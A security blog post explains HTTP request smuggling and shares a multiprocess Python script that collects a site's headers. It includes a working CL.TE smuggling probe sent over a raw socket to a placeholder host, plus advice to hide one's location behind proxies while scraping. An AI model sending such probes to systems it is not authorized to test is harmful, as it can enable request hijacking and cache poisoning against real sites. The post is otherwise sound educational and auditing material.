HTTP and Request Smuggling

Hello All,
I recently stumbled upon an article that detailed an interesting exploit.  It is one that has been around for a while and, if accurately executed, could have a disastrous impact on an organization.  Today we are talking about "Request Smuggling."

As I do whenever I start traveling down a security rabbit hole, I began planning all kinds of cool, fun scripts that could complement the concept I had been studying.  Today's script is no different.  However, I had to scale back: I had added a ton of features that would have made an interesting product, but in the end I decided to remove those add-ons and include them in a separate package later.  In this script we are focusing on HTTP headers only and obtaining the required information from them.

I hope that you did read the article; it was well done.  As a high-level description: the information passing between your machine and the back-end server hosting the site you are visiting may travel through multiple layers of servers.  This arrangement is becoming more and more common as hosted environments move to cloud solutions.  Misconfigurations between the front-facing servers and the back-end servers may allow a person with malicious intent to piggyback their own content onto legitimate HTTP requests passing through.  Specifically, we are looking at the relationship between the Transfer-Encoding and Content-Length headers.

Each of these headers is normal on its own and appears all the time.  However, if they are packaged together incorrectly and the front end and back end disagree about which one delimits the request body, the connection can be left in a state where one server disregards the content length.  That leaves us with a vulnerability loosely reminiscent of a buffer overflow, and it justifies the name "Request Smuggling": the attacker is smuggling his/her own request in alongside another HTTP request.
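To make this concrete, here is a minimal sketch of the classic CL.TE probe, where the front end honors Content-Length and the back end honors Transfer-Encoding.  The host and port below are placeholders, and you should only ever send something like this to systems you are authorized to test:

import socket

# CL.TE probe: Content-Length says the body is 13 bytes ("0\r\n\r\nSMUGGLED"),
# but a chunked-parsing back end stops at the zero-length chunk, leaving
# "SMUGGLED" queued as the prefix of the next request on the connection.
payload = (
    b"POST / HTTP/1.1\r\n"
    b"Host: example.com\r\n"
    b"Content-Length: 13\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"SMUGGLED"
)

# example.com is a placeholder -- point this only at your own test setup.
with socket.create_connection(("example.com", 80)) as s:
    s.sendall(payload)
    print(s.recv(4096).decode(errors="replace"))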

Below I have added my script that retrieves the headers for a target site.  Ideally this script would be used by an auditor (yourself) to analyze the headers that are present on your own site.  The information gathered here is transferred between the host machine and the server every time someone visits the website.  There are actually tons of ways to analyze HTTP headers.  My way here is not unique, but I have added some features that make it interesting.

Extra features:
  • I intentionally make three separate requests to the site.  The purpose is that the script is primed for you to utilize proxies.  When you are scraping or accessing a site frequently to gather information, it is a good idea to obscure your location, and proxies also assist with privacy.  You will see that I have a section for you to add proxies.  When you add your proxy, change this line in each function (see the short sketch after this list):
    • resp = requests.get(var) -----> resp = requests.get(var, proxies=proxies1) [modify appropriately for each function; note the keyword is proxies, not proxy]
    • The vision was that you would use three different proxies.
  • Multiprocessing:  As soon as I added three separate requests, it became immediately evident that multiprocessing was needed.  You could use a proxy from Belarus in one function and a proxy from Mexico in the next; your requests would effectively be connecting to and hopping across large distances.  While our traffic actually does this all the time as it hops along the internet, it is nice for things to go a little faster.  Those familiar with interpreted languages understand that execution is very linear; multiprocessing lets us better utilize our host machines by running the three requests in parallel.
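For reference, here is a short sketch of the proxy format that requests expects: a dict mapping each scheme to a proxy URL, passed through the proxies keyword argument.  The address below is a documentation placeholder; substitute your own proxy:

import requests

# One proxy URL per scheme; 203.0.113.10 is a placeholder address.
proxies1 = {
    'http': 'http://203.0.113.10:8080',
    'https': 'http://203.0.113.10:8080'
}

resp = requests.get('https://mytargetsite.com', proxies=proxies1, timeout=10)
print(resp.status_code)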
You can run the script from the terminal as follows:

python3 http_view.py https://mytargetsite.com

***Always be careful using free proxies online.  Nothing is free.  Free proxies are known to manipulate the traffic traveling through them.  I only use free proxies when I don't care that my traffic is being manipulated.  Why would I not care?  Well, that is a discussion for another blog entry ;)

Enjoy!

import requests
import sys
from multiprocessing import Process

# Require exactly one argument: the target URL.
if len(sys.argv) != 2:
    print("usage: python3 http_view.py https://mytargetsite.com")
    sys.exit(1)

var = sys.argv[1]

# Fill in your own proxies below -- ideally a different one per function.
proxies1 = {
    'http': 'http://50.233.42.98:51696',
    'https': 'http://50.233.42.98:51696'
}
proxies2 = {
    'http': 'http://50.233.42.98:51696',
    'https': 'http://50.233.42.98:51696'
}
proxies3 = {
    'http': 'http://50.233.42.98:51696',
    'https': 'http://50.233.42.98:51696'
}

def r():
    # GET request; to route through a proxy use:
    # resp = requests.get(var, proxies=proxies1)
    print("\n\n")
    resp = requests.get(var)
    for key, value in resp.headers.items():
        print(key, "###", value)
    resp.close()

def p():
    # HEAD request; to route through a proxy use:
    # resp = requests.head(var, proxies=proxies2)
    print("\n\n")
    resp = requests.head(var)
    print("#" * 20)
    for key, value in resp.headers.items():
        print(key, "##", value)
    resp.close()

def o():
    # OPTIONS request; to route through a proxy use:
    # resp = requests.options(var, proxies=proxies3)
    resp = requests.options(var)
    print("\n\n")
    print("#" * 20)
    for key, value in resp.headers.items():
        print(key, "##", value)
    resp.close()

# Guarding with __main__ keeps spawned child processes from re-running this
# block, and join() makes sure we wait for all three requests to finish.
if __name__ == '__main__':
    print("utility to collect HTTP Headers!\n")

    myProcess1 = Process(target=r)
    myProcess2 = Process(target=p)
    myProcess3 = Process(target=o)

    myProcess1.start()
    myProcess2.start()
    myProcess3.start()

    myProcess1.join()
    myProcess2.join()
    myProcess3.join()
